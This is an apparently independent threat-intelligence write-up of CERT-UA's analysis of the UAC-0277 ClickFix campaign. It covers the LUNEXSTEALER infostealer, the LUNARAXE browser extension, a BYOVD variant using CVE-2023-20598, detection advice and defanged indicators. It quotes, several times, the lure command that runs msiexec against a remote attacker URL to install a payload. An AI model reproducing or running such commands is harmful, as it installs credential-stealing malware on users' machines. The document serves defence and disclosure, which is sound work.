
Ukraine’s government incident response team describes a ClickFix campaign served from more than a hundred compromised sites and steered through a smart contract. One of its three installation chains loads a vulnerable AMD driver whose sample does not appear in the April 2026 copy of the Microsoft blocklist examined here.
The facts
On 30 September 2026, CERT-UA (1), Ukraine’s government computer incident response team, part of the State Service of Special Communications and Information Protection, published its analysis of a campaign tracked under the cluster identifier UAC-0277.
In September 2026, its analysts identified more than a hundred compromised websites whose pages carry malicious JavaScript code. On these compromised sites, visitors are shown a fake Cloudflare verification page which, on the pretext of confirming that they are human, asks them to run a command. That command downloads and installs an MSI (2) package from a remote server. CERT-UA links this method to the ClickFix technique.
Several MSI packages circulated during the campaign; CERT-UA obtained and analysed three variants. All of them end with the execution of LUNEXSTEALER, a 64-bit Windows infostealer that doubles as a remote task execution agent. Depending on the configuration received from its command-and-control server, LUNEXSTEALER installs the malicious LUNARAXE extension, displayed in the browser under the name “Microsoft Office Word Editor”, and the NAIVEMESS component, which gives that extension access to the file system.
The campaign assembles methods already documented separately: configuration stored in a smart contract, a fake Cloudflare verification page, installation of an MSI package from a URL (3), then, depending on the variant, BYOVD (4) or DLL (5) side-loading. The point common to all three variants is the command pasted into the Run dialog: msiexec.exe launched with a URL as its argument.
CERT-UA gives no number of victims or sectors affected, and makes no attribution beyond the UAC-0277 identifier. The smart contract addresses are not among the published indicators.
The infection chain
A configuration read from a smart contract
The script injected into the compromised sites does not hold the domain that serves the fake verification page in clear. That domain and the script’s operating mode are stored in a smart contract on the Polygon or Ethereum blockchain, and read again by the script on every execution, and therefore from the visitor’s browser. The operator can thus change the domain or the mode for all the compromised sites, centrally and without going back to them.
| Mode | Behaviour described by CERT-UA |
|---|---|
0 | Inactive. |
1 | Passive visitor tracking: the site visited and the referring page are sent to the attackers’ server. |
2 | Display of the fake verification page. |
Fig. 1. Operating modes of the injected script, read from the smart contract.
In mode 2, the fake verification page is shown only when three conditions are all met: the visitor runs Windows, arrives through a link from a search engine (Google, DuckDuckGo, meta.ua, bigmir.net, among others), and has not already been shown it twice in the last 12 hours. Direct access to the site, from another operating system or without going through a search engine, therefore does not display the page.
Storing configuration data in a smart contract was described by Guardio Labs in October 2023 under the name EtherHiding, in the ClearFake campaign, which used the BNB Smart Chain. GTIG (6) documented its use by the North Korean actor UNC5342 on 16 October 2025. The use of Polygon to distribute the domains of ClickFix campaigns was reported in 2026, notably by Whalebone in May and by GuidePoint Security in September. CERT-UA establishes no link between UAC-0277 and these activities, and no connection is drawn here.
The fake Cloudflare verification page
The fake verification page asks the visitor to run a command. The three commands published by CERT-UA share the same form:
msiexec.exe /i "hXXps://uasputnik[.]com/elit.msi" /passive ORG_NOTE=”Захист від автоматичних запитів… ✔️ Підтверджую, що я не робот.”
The /i option installs the MSI package directly from the URL, and /passive runs the installation unattended, with only a progress bar. The command ends with a public property, ORG_NOTE, whose value, in Ukrainian, means “Protection against automated requests… ✔️ I confirm that I am not a robot.”. Proofpoint described a comparable method in November 2024: a fake verification message placed at the end of the command, so that the victim does not see the actual command in the Run dialog.
Named by Proofpoint in 2024, the ClickFix technique appears in ATT&CK (7) under the identifier T1204.004 Malicious Copy and Paste. CERT-UA points out that no legitimate “I’m not a robot” check ever asks you either to press Windows+R or open the Command Prompt or PowerShell, or to paste a command in order to run it, and advises closing the page in that case, even on a familiar site.
Three MSI package variants
| Variant | Mechanism | Final payload |
|---|---|---|
| 1 | The MSI package installs LUNEXSTEALER directly. | LUNEXSTEALER |
| 2 | The MSI package contains a loader that attempts to bypass Windows User Account Control, adds exclusions to Microsoft Defender, drops the AMD driver PDFWKRNL.sys and exploits CVE-2023-20598 (8) to counter protection tools, then downloads and launches LUNEXSTEALER. | LUNEXSTEALER |
| 3 | The MSI package drops FnHotkeyUtility.exe, presented as legitimate, which loads the malicious library spkvol.dll; that library decrypts and launches LUNEXSTEALER. | LUNEXSTEALER |
Fig. 2. The three MSI package variants analysed by CERT-UA.
Variant 2: BYOVD and CVE-2023-20598
AMD published CVE-2023-20598 on 16 October 2023 in bulletin AMD-SB-6009. It concerns improper privilege management in the pdfwkrnl.sys kernel driver of AMD Software, Adrenalin and PRO editions: an authenticated attacker can, through a crafted IOCTL (9) request, gain input/output control over arbitrary hardware ports or physical addresses, with possible arbitrary code execution. The NVD (10) gives the flaw a CVSS (11) 3.1 score of 7.8 (vector AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), and CISA (12) maps it to CWE-269 (13). The fixed versions are AMD Software Adrenalin Edition 23.9.2, of 19 September 2023, and PRO Edition 23.Q4, of 12 December 2023.
In a BYOVD scenario, updating the driver installed on the workstation offers no protection: the attacker drops their own signed copy of the vulnerable driver and loads it. The countermeasure targets the loading of the driver, not the installed version.
CVE-2023-20598 is not in CISA’s KEV (14) catalogue (version 2026.10.04 of 4 October 2026, 1,734 entries), and the NVD record carries no date of addition to that catalogue. CISA’s SSVC (15) assessment, dated 27 June 2024, records exploitation at the PoC (16) stage.
The hashes published by CERT-UA for the file embedded_driver.sys, SHA-256 (17) 6e8b49cf70bf854e8c59c7d27cefa89406caf8978461190dabb86dafcd8554e1 and MD5 (18) b96d75a000367c200958089728fc5cb8, are identical to those of the PDFWKRNL.sys sample listed by the LOLDrivers project since 20 March 2026. LOLDrivers describes the file as the Advanced Micro Devices driver “USB-C Power Delivery Firmware Update Utility Driver”, version 1.0, signed by AMD, and added it to its catalogue with reference to ESET’s research on EDR (19) killers published in March 2026.
CERT-UA recommends enabling Microsoft’s vulnerable driver blocklist. In the copy of that blocklist archived by LOLDrivers (SiPolicy_Enforced.xml, version 10.0.27825.0, file updated in the repository on 13 April 2026), five deny rules target PDFWKRNL.sys by hash. None matches the Authenticode hashes of the sample cited by CERT-UA, SHA-1 (20) 661A1A28950CEC3F2C3D0E72AB2A05D4A173CF9A and SHA-256 FC23ABDCF93928E1DB8401A7FF53C86C85230A8637C4168F7434208F9E8B5DED, and no publisher-based rule covers this file. The blocklist deployed on workstations may be more recent than this copy: coverage of this sample needs to be checked against the policy actually applied, and supplemented where needed by an App Control for Business deny rule on these hashes.
Variant 3: DLL side-loading
CERT-UA presents FnHotkeyUtility.exe as a legitimate file, without naming its publisher. It loads spkvol.dll, and that library decrypts then launches LUNEXSTEALER. Four distinct hashes of spkvol.dll appear among the indicators. The published paths place these files in subdirectories of %PROGRAMDATA% named SalmonLightSlateGray, SlateGrayChocolate and GrayLightCyan; the two files sit together in SalmonLightSlateGray and in GrayLightCyan. All three names put together colour names from the CSS (21) standard: Salmon, LightSlateGray, SlateGray, Chocolate, Gray and LightCyan.
LUNEXSTEALER and the LUNARAXE extension
| Component | Nature | Functions described by CERT-UA | Link to the command-and-control server |
|---|---|---|---|
| LUNEXSTEALER | 64-bit Windows executable | Theft of passwords and tokens stored in browsers, of cryptocurrency wallet data, desktop applications and browser extensions alike, and of system information. Download and execution of executables, MSI packages, PowerShell scripts and cmd.exe commands. Contains the LUNARAXE extension and the NAIVEMESS deployment components, installed according to the configuration received. Depending on the configuration, persistence through the scheduled task psychedelicloveUtils. | HTTP (22) |
| LUNARAXE.CORE | Main component of the extension, for Chromium-based browsers | Sends cookies, browsing history, bookmarks, the list of installed extensions and credentials intercepted by LUNARAXE.STEALER. Manages tabs and takes screenshots of them, changes proxy settings, enables or disables extensions, shows notifications, runs JavaScript in pages and overlays a full-screen iframe on their content. With NAIVEMESS, copies files from the workstation, writes files to it and runs them. Resumes automatically after a browser restart. | HTTP and WebSocket |
| LUNARAXE.STEALER | Script running in web pages | Reads the username and password fields when a form is submitted, or when its submit button is clicked, and passes them with the page address to LUNARAXE.CORE through the extension’s internal messaging. | None |
| LUNARAXE.STRIP | Auxiliary component of the extension | Removes CSP (23) headers from HTTP responses by means of the browser’s network request modification rules, removes the corresponding meta tags from pages and watches for their reinsertion. | None |
| NAIVEMESS | PowerShell script registered as the Native Messaging host com.lunex.explorer | Lists drives, browses directories, reads, creates, overwrites and runs files. Files are transferred in Base64-encoded chunks, directories and groups of files are first compressed to ZIP. | None, commands arrive through the extension |
Fig. 3. Components of LUNEXSTEALER and LUNARAXE.
CERT-UA assesses that removing the CSP probably allows the other LUNARAXE components to run their own JavaScript and to send data, including on sites with strict security policies.
Native Messaging, the gateway to the file system
Native Messaging is a legitimate mechanism of Chromium-based browsers that lets an extension exchange messages with a program installed on the workstation. On Windows, the host is declared by a registry key placed under HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, \Software\Google\Chrome\NativeMessagingHosts\<name> for Chrome and \Software\Microsoft\Edge\NativeMessagingHosts\<name> for Edge, whose default value points to a JSON (24) manifest. The browser starts the host process itself and talks to it over standard input and standard output. A host declared under HKEY_CURRENT_USER installs without administrator rights.
CERT-UA does not state under which registry root NAIVEMESS is registered. The host name to look for under both roots is com.lunex.explorer.
ATT&CK mapping
CERT-UA does not publish an ATT&CK mapping. The mapping below is drawn up for this article from its description, and each identifier has been checked against the official STIX (25) data of ATT&CK Enterprise, version 19.2.
| Tactic | Technique | Observed element |
|---|---|---|
| Initial Access | T1189 Drive-by Compromise | Script injected into more than a hundred compromised sites |
| Execution | T1204.004 Malicious Copy and Paste | Command to be pasted into the Run dialog |
| Stealth | T1218.007 Msiexec | msiexec.exe /i on a remote URL |
| Privilege Escalation | T1548.002 Bypass User Account Control | Variant 2 |
| Defense Impairment | T1685 Disable or Modify Tools | Exclusions added to Microsoft Defender, variant 2 |
| Defense Impairment | T1687 Exploitation for Defense Impairment | PDFWKRNL.sys, CVE-2023-20598, variant 2 |
| Stealth, Execution | T1574.001 DLL | FnHotkeyUtility.exe loads spkvol.dll, variant 3 |
| Persistence | T1053.005 Scheduled Task | Task psychedelicloveUtils |
| Persistence | T1176.001 Browser Extensions | LUNARAXE extension |
| Credential Access | T1555.003 Credentials from Web Browsers | Passwords stored in browsers |
| Credential Access | T1539 Steal Web Session Cookie | Cookies sent by LUNARAXE.CORE |
| Collection | T1185 Browser Session Hijacking | JavaScript execution in pages, form interception, tab control |
| Discovery | T1082 System Information Discovery | System information collected by LUNEXSTEALER |
| Execution | T1059.001 PowerShell | NAIVEMESS, PowerShell scripts launched by LUNEXSTEALER |
| Command and Control | T1071.001 Web Protocols | HTTP and WebSocket |
| Command and Control | T1105 Ingress Tool Transfer | Download of LUNEXSTEALER and of additional payloads |
Fig. 4. ATT&CK Enterprise v19.2 mapping drawn up for this article.
Version 19 of ATT&CK renamed tactic TA0005, Defense Evasion, to Stealth, and created the Defense Impairment tactic, TA0112. In that version T1562.001 Disable or Modify Tools is revoked in favour of T1685. Since version 17, T1574.002 DLL Side-Loading has been revoked in favour of T1574.001 DLL. A rule or report that still cites the old identifiers remains readable, but no longer matches the framework in force.
Detection and hardening
CERT-UA’s recommendations and how to implement them
| CERT-UA recommendation | Implementation | Limit |
|---|---|---|
| Prevent standard users from using the Run dialog (Windows+R) through Group Policy. | User policy “Remove Run menu from Start Menu” (Administrative Templates, Start Menu and Taskbar), which writes NoRun=1 under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer and also disables the Windows+R shortcut. | Microsoft states that the policy does not prevent other ways of running a program. A fake verification page that asks the user to open PowerShell or a terminal is not covered. |
Restrict the installation of MSI packages by users without administrator rights, and monitor msiexec.exe launched with a URL. | Computer policy “Turn off Windows Installer”, option “For non-managed applications only”, which sets DisableMSI=1 under HKLM\Software\Policies\Microsoft\Windows\Installer: non-elevated per-user installations are blocked. | Elevated per-user and per-machine installations remain allowed. |
| Enable the Microsoft Vulnerable Driver Blocklist. | Enabled by default since Windows 11 22H2. On Windows 10, it applies with HVCI (26) or in S mode (article KB5020779). | Microsoft does not guarantee that the blocklist covers every vulnerable driver. See the point of caution on PDFWKRNL.sys. |
| Restrict browser extension installation to an allowlist. | Chrome and Edge policies ExtensionInstallBlocklist set to * and ExtensionInstallAllowlist. For Native Messaging: NativeMessagingUserLevelHosts set to 0, or NativeMessagingBlocklist set to * with NativeMessagingAllowlist. | NativeMessagingUserLevelHosts set to 0 only keeps hosts installed at system level: a host dropped with administrator rights gets through. |
Fig. 5. CERT-UA recommendations and the corresponding Windows and browser settings.
Hunting leads
- Creation of an
msiexec.exeprocess with/iand a URL as argument (event 4688 with command line logging, or Sysmon event 1). The stringORG_NOTE=appears in all three published commands. - Values of the
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRUkey containingmsiexecor a URL: this key keeps the commands typed into the Run dialog, and public Sigma rules use it for ClickFix. - Loading of a driver with SHA-256 hash
6e8b49cf70bf854e8c59c7d27cefa89406caf8978461190dabb86dafcd8554e1(Sysmon event 6). This hash appears in the Sysmon configurations published by LOLDrivers. - Exclusions added to Microsoft Defender: event 5007 in the
Microsoft-Windows-Windows Defender/Operationallog concerning theExclusionskey. - Scheduled task
psychedelicloveUtils(event 4698 if the corresponding audit is enabled) and mutexLocal\psychedeliclove-guard. - Key
NativeMessagingHosts\com.lunex.explorerfor Chrome or Edge, under both registry roots. - Extension named “Microsoft Office Word Editor” in the browser extension inventory.
- A
%PROGRAMDATA%directory containing bothFnHotkeyUtility.exeandspkvol.dll. - Network traffic to the indicators, including the WebSocket channel
193[.]178.159.128:8080/api/v1/ext/remote.
CERT-UA asks to be notified of any site displaying the fake verification page, and offers owners and administrators of compromised sites help in establishing how the compromise occurred.
Indicators of compromise
Indicators published by CERT-UA, reproduced verbatim, including the source’s defanged notation ([.], hXXp, [:]). The order and grouping of the source are preserved; the Group column numbers the groups of files as they appear in the publication, without linking them to a variant, which CERT-UA does not specify. The extension files appear in two groups, with identical or similar names and different hashes.
Files
| Group | File and hashes |
|---|---|
| 1 | elita.msiMD5 1f250eb486571d99bc1e4d760e37a554SHA-256 38e90affe37342ee36917cdc535fe9bf04589afa8430eb8d1ba1016adcfc1878 |
| 1 | psychedelic.exeMD5 348cabe85c8bb40e690ab873ab94acacSHA-256 bf14cd6c3328ebd08e940478b5d1da04e9e5aa576d045d41950bf4f1e2456dd8 |
| 2 | embedded_driver.sysMD5 b96d75a000367c200958089728fc5cb8SHA-256 6e8b49cf70bf854e8c59c7d27cefa89406caf8978461190dabb86dafcd8554e1 |
| 2 | elit.msiMD5 670086be6d64b3fc9d9edcbaf8986c02SHA-256 3b039a36ed576353cb7eb1054b6ac56f42f63a6fc447edeb58c48b4bb7537482 |
| 2 | Progressive.exeMD5 dac640a37d5096c47fdd8f745b9a9115SHA-256 2a373c2ace484d2ada44a26b356de18b5ec8e9d57c5060d42ff239ec1705059c |
| 2 | spkvol.dllMD5 d8a99b7a81cfdacc8734e098efe8076eSHA-256 ad858ea577379fe1ab9e566b2108302185527c66eb9cbd7d0e381297316e8881 |
| 2 | psychedeliclove.exeMD5 ae5450f32bcb533c5b592c77a7861553SHA-256 06f434695f93d7fd11eeff71358ff69fed79d310a66d993bbcc4ff979c117c90 |
| 3 | elite.msiMD5 081eba2bfe3bfb56d6c5ad7d1b28fd6cSHA-256 cbe90746b6c6f0e4c0e80d4748a149f85341f8405b9e524f8abcf0723a97438b |
| 3 | elite.exeMD5 f45a2b3995b2da034b2e03b7ed6cdaaaSHA-256 f145d4f731d4140de183473b5c6a500a31f44173153fd323cadafa334ee83a3d |
| 4 | think.msiMD5 86f5a4f1e83e8b9db390736539863e91SHA-256 eed67d92d1f059e5b848114c0846207db357d1d60b494b88b8f0e3d9ba5cf24a |
| 4 | fresh-thinking_12.9.84.30_INSTALL.exeMD5 cb18caf0dd576a356bb0627989f85b8cSHA-256 c2198398e84684d7b48d92261996116d2d98c7d4ffbff2b8cc955d1ff06e77eb |
| 4 | spkvol.dllMD5 b7081d752375ad8b06639cc9506a4e8eSHA-256 f16ed095c92c5f65ddb43bf4a6352da1deaead4e98d7187c4fc44d17dfbe88ad |
| 5 | background.ts-Dgde4GDq.jsMD5 19911b5ad1a5952bf17ecff467b45c62SHA-256 0eb2c2ac3c593bbeef72dff02a38cdba18589b1dc65f3fd730ed33e9e99cb8b7 |
| 5 | content.ts-B6XGI__y.jsMD5 9a5d0e4382efec512737fdecb8a71dd8SHA-256 274dc91b92bf17a05ff4f3bfae04924167e4d53f276e7b6c0d6026b3304827b0 |
| 5 | service-worker-loader.jsMD5 eac6683cb79f2e3bd570ee9edd077f3bSHA-256 6b6a30712d566d30a20c6232d2fe9bc1c49170d78d1ab548513ab46f86bf3c06 |
| 5 | manifest.jsonMD5 e5a52ed35bece9bf020b891e47317787SHA-256 1eb51ef2544ce57dfdfafd3b1400e43abb244887b14c82d0c5a984af70152838 |
| 5 | csp-strip.ts-DrI45pKU.jsMD5 e69a8798fe7d92cee5f7b5321866f01eSHA-256 725c1cb7ca5f669574988069a3cdb617cba891d4a4a03aa9a1fd3f95c6035997 |
| 6 | esptnk.msiMD5 0b05147f194274070073c8768684cea5SHA-256 4efef6a50ae74ea49283a7aec1ee2014ce15a17c05ac0c8df082a6f1449781fa |
| 6 | solution_6.81.6017.2_INSTALL.exeMD5 3408ae0d10986ea2c50dca523667ac47SHA-256 4cd6b9a5841aabb060f10d4d029d1c10a69ad6d2d9291243c504977cf715fefb |
| 6 | spkvol.dllMD5 b705a55c963c4c624bfd5d67c6c25fbbSHA-256 c4e6cfad25e0a93b8542c6280d6c5e0b9de2cfe18c9a67f2d6e4570ae2b92fef |
| 7 | background.ts-L_QBuUJg.jsMD5 ccaa01de34fad977420179382f37bc3eSHA-256 289e408e1d2661f55e59611535a156914cd7c60f69f6e3de1163c01c56e487d2 |
| 7 | content.ts-B6XGI__y.jsMD5 f145ec4608878fcbe5b4c94e510b453cSHA-256 09f83b5f79b934e12f8077b2b462d938ea8124e15ea0debeefe22b706d6c1e92 |
| 7 | service-worker-loader.jsMD5 d8ac71c0593997a5d95276bf705ec7e3SHA-256 299617dd8b220a49dfaa0cbd0c997e9ba8b01d4cfb0f7aada5db923403dc0587 |
| 7 | manifest.jsonMD5 e3ccdf43a405127c7f1eadce436fccd7SHA-256 3c9bef5c766c8c0bcc403248a489e656f4e31bea0083575dc815afe68f6abe26 |
| 7 | csp-strip.ts-DrI45pKU.jsMD5 502eb1fb70c0153f0d56f12d49a20094SHA-256 957776ef93ff598bfbe9dfba8c80425c1718927605c42e26131b0362dd790343 |
| 8 | omen.msiMD5 2b19559333c0a5047892cf7239b9057dSHA-256 fd80d52c7aa4f82744fb6a82c878851a6dd50e001bfbb2b7dd9df884dbcdfb40 |
| 8 | omen.exeMD5 9fb1c651405f35c859fc89ff4c142a49SHA-256 b862fa82eacf4b989c6a82155c1f4ab0b435f57b4d20a0bf2871fc675fca6059 |
| 8 | spkvol.dllMD5 51ccf7074c6d4753e4a1d335184c39d4SHA-256 c67c0800d9cff00b0b377e205e03ff4dcb5a6587cceacb4e7b08e29c51aeee9f |
Fig. 6. Files, 28 hashes in eight groups.
Network
| IP address |
|---|
107[.]175.82.242 |
193[.]178.158.61 |
193[.]178.159.128 |
109[.]238.86.112 |
109[.]238.86.113 |
176[.]53.159.40 |
159[.]69.234.218 |
Fig. 7. IP (27) addresses, 7 entries.
| Domain |
|---|
ahahahahadebili[.]help |
fsputnik[.]com |
sputnk[.]com |
uasputnik[.]com |
uasputn[.]com |
partaonline[.]click |
vibestglobal[.]com |
flareru[.]live |
plerdgate[.]com |
ukrainerada[.]top |
radaukraine[.]top |
astratechuthree[.]top |
spectre.pp[.]ua |
chillplace.pp[.]ua |
alohapages.pp[.]ua |
vatra.pp[.]ua |
fainomedia.pp[.]ua |
trembita.pp[.]ua |
archivision.pp[.]ua |
Fig. 8. Domains, 19 entries.
| URL |
|---|
(ws)://193[.]178.159.128:8080/api/v1/ext/remote |
hXXp://107[.]175.82.242:9000/wilow/psychedeliclove[.]exe |
hXXp://193[.]178.159.128:8080 |
hXXps://uasputnik[.]com/elit.msi |
hXXps://uasputnik[.]com/elita.msi |
hXXps://uasputnik[.]com/elite.msi |
hXXp://109[.]238.86.112:8080 |
hXXp://109[.]238.86.113:8080 |
hXXps://ahahahahadebili[.]help/tds/tds.php |
hXXps://ahahahahadebili[.]help/think.msi |
hXXps://sputnk[.]com/think.msi |
hXXps://uasputn[.]com/esptnk.msi |
hXXps://uasputnik[.]com/omen.msi |
hXXps://ukrainerada[.]top/tds/tds.php |
hXXps://chillplace.pp[.]ua/tds/tds.php |
hXXps://alohapages.pp[.]ua/tds/tds.php |
hXXps://spectre.pp[.]ua/tds/tds.php |
hXXps://spectre.pp[.]ua/spectre.msi |
https[:]//ilovecutecatetetes[.]click |
https[:]//ilovecutecatics[.]com |
http[:]//ilovecutecatics[.]com[:]8080 |
https[:]//ilovecutecatics[.]com[:]2053 |
https[:]//ilovecutecaticval[.]com[:]2053 |
Fig. 9. URLs, 23 entries.
Host
| Host indicator |
|---|
%PROGRAMDATA%/SalmonLightSlateGray/FnHotkeyUtility.exe |
%PROGRAMDATA%/SalmonLightSlateGray/spkvol.dll |
%PROGRAMDATA%\SlateGrayChocolate\spkvol.dll |
%PROGRAMDATA%\GrayLightCyan\FnHotkeyUtility.exe |
%PROGRAMDATA%\GrayLightCyan\spkvol.dll |
%TEMP%\psychedeliclove.exe |
Local\psychedeliclove-guard |
msiexec.exe /i "hXXps://uasputnik[.]com/elit.msi" /passive ORG_NOTE=”Захист від автоматичних запитів… ✔️ Підтверджую, що я не робот.” |
msiexec.exe /i "hXXps://uasputnik[.]com/elita.msi" /passive ORG_NOTE=”Захист від автоматичних запитів… ✔️ Підтверджую, що я не робот.” |
msiexec.exe /i "hXXps://uasputnik[.]com/elite.msi" /passive ORG_NOTE=”Захист від автоматичних запитів… ✔️ Підтверджую, що я не робот.” |
psychedelicloveUtils (Scheduled Task) |
Fig. 10. Host indicators, 11 entries.
Source qualification
A single primary source describes the campaign. The elements that can be verified elsewhere have been cross-checked against independent sources.
| Item | Status | Comment |
|---|---|---|
| Description of the campaign, variants, components and indicators | single source | CERT-UA publication of 30 September 2026. No third-party publication on UAC-0277, LUNEXSTEALER, LUNARAXE or NAIVEMESS was found as of 6 October 2026. |
Identity of the file embedded_driver.sys | corroborated | MD5 and SHA-256 hashes identical to the LOLDrivers PDFWKRNL.sys sample. |
| CVE-2023-20598, score, weakness and fixed versions | corroborated | Bulletin AMD-SB-6009 and the NVD record agree, including on versions 23.9.2 and 23.Q4. |
| CVE-2023-20598 absent from the KEV catalogue | corroborated | Catalogue file published by CISA, version 2026.10.04, and an NVD record with no date of addition to the catalogue. |
| Sample not covered by the Microsoft blocklist | single source | Copy of the blocklist archived by LOLDrivers, updated on 13 April 2026. The version currently distributed by Microsoft was not consulted. |
| Use of Polygon in other ClickFix campaigns in 2026 | corroborated | Whalebone, May 2026, and GuidePoint Security as reported by Dark Reading, September 2026. |
| ATT&CK mapping | single source | Drawn up for this article; identifiers and names checked against the ATT&CK Enterprise v19.2 STIX data. |
| Link between UAC-0277 and ClearFake, UNC5342 or other operators using EtherHiding | discarded | No link established by CERT-UA or by the sources consulted. |
Assessment
This analysis is built on the Ukrainian version of the CERT-UA publication, without access to the samples. The driver hashes were compared with LOLDrivers data and with its copy of the Microsoft blocklist, the status of CVE-2023-20598 with the NVD record, the AMD bulletin and the KEV catalogue file, and the ATT&CK identifiers with the v19.2 STIX data. The reproduced indicators were compared with the source page by script. The ratings in the grid are judgement.
Glossary
- CERT-UA (1): Computer Emergency Response Team of Ukraine, Ukraine’s government computer incident response team, part of the State Service of Special Communications and Information Protection.
- MSI (2): Microsoft Installer, the installation package format handled by Windows Installer and launched from the command line with
msiexec.exe. - URL (3): Uniform Resource Locator, the address of a resource on the web.
- BYOVD (4): Bring Your Own Vulnerable Driver, the attacker dropping and loading a legitimate, signed and vulnerable driver to gain kernel mode rights.
- DLL (5): Dynamic-Link Library, a code library loaded dynamically by a Windows program.
- GTIG (6): Google Threat Intelligence Group, Google’s team dedicated to threat analysis.
- ATT&CK (7): Adversarial Tactics, Techniques, and Common Knowledge, the framework of attack tactics and techniques maintained by MITRE.
- CVE (8): Common Vulnerabilities and Exposures, the public identifier assigned to a vulnerability.
- IOCTL (9): Input/Output Control, a control request sent by a program to a driver.
- NVD (10): National Vulnerability Database, the vulnerability database of the United States NIST.
- CVSS (11): Common Vulnerability Scoring System, the system for rating the severity of vulnerabilities.
- CISA (12): Cybersecurity and Infrastructure Security Agency, the United States cybersecurity and infrastructure security agency.
- CWE (13): Common Weakness Enumeration, the classification of software weaknesses.
- KEV (14): Known Exploited Vulnerabilities, CISA’s catalogue of vulnerabilities whose exploitation has been observed.
- SSVC (15): Stakeholder-Specific Vulnerability Categorization, the vulnerability prioritisation method used by CISA.
- PoC (16): Proof of Concept, a technical demonstration that a flaw can be exploited.
- SHA-256 (17): Secure Hash Algorithm 256 bits, the hash function used for file hashes.
- MD5 (18): Message Digest 5, a hash function, used here as a complementary hash.
- EDR (19): Endpoint Detection and Response, a detection and response tool for workstations and servers.
- SHA-1 (20): Secure Hash Algorithm 1, a 160-bit hash function.
- CSS (21): Cascading Style Sheets, the styling language for web pages, which defines a list of colour names.
- HTTP (22): Hypertext Transfer Protocol, the transfer protocol of the web.
- CSP (23): Content Security Policy, the security policy that restricts a page’s script sources and the destinations of the data it sends.
- JSON (24): JavaScript Object Notation, a text format for structured data.
- STIX (25): Structured Threat Information Expression, a format for exchanging threat data, used to publish ATT&CK.
- HVCI (26): Hypervisor-protected Code Integrity, kernel mode code integrity enforcement protected by the Windows hypervisor.
- IP (27): Internet Protocol, the addressing protocol of the Internet.
Sources
- CERT-UA, “UAC-0277: ClickFix на скомпрометованих вебсайтах для поширення LUNEXSTEALER”, 30 September 2026. cert.gov.ua
- AMD, bulletin AMD-SB-6009, AMD Radeon Graphics Kernel Driver Privilege Management Vulnerability, 16 October 2023. amd.com
- NIST NVD, record CVE-2023-20598, published 17 October 2023, accessed 6 October 2026. nvd.nist.gov
- CISA, Known Exploited Vulnerabilities catalogue, version 2026.10.04, 4 October 2026. github.com/cisagov/kev-data
- LOLDrivers,
PDFWKRNL.sysentry, added 20 March 2026. loldrivers.io - LOLDrivers, copy of the Microsoft blocklist
SiPolicy_Enforced.xml, version 10.0.27825.0, updated 13 April 2026. github.com/magicsword-io/LOLDrivers - Microsoft, KB5020779, The vulnerable driver blocklist after the October 2022 preview release, October 2022. support.microsoft.com
- MITRE, ATT&CK Enterprise v19.2, STIX data, 5 August 2026. github.com/mitre-attack/attack-stix-data
- MITRE, ATT&CK, T1204.004 Malicious Copy and Paste, accessed 6 October 2026. attack.mitre.org
- Proofpoint, Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape, November 2024. proofpoint.com
- Guardio Labs, EtherHiding: Hiding Web2 Malicious Code in Web3 Smart Contracts, October 2023. guard.io
- Google Threat Intelligence Group, DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains, 16 October 2025. cloud.google.com
- Whalebone, The Secrets of Blockchain: ClickFix Utilizes Polygon for C2 Domain Distribution, 27 May 2026. whalebone.io
- Dark Reading, ClickFix Campaign Compromises 31 Orgs, Abuses Polygon Blockchain, GuidePoint Security research, 1 September 2026. darkreading.com
- Google, Chrome for Developers, Native messaging, accessed 6 October 2026. developer.chrome.com
- Microsoft Learn, Edge policy NativeMessagingUserLevelHosts, accessed 6 October 2026. learn.microsoft.com
- Microsoft Learn, DisableMSI, Windows Installer policy, accessed 6 October 2026. learn.microsoft.com
- Microsoft, NoRun, registry entry for the Remove Run menu from Start Menu policy, accessed 6 October 2026. technet.microsoft.com
Marked TLP:CLEAR, PAP:CLEAR. Unlimited disclosure, no restriction on use.
The analysis presented here reflects the author’s own views and rests on the public sources listed above.



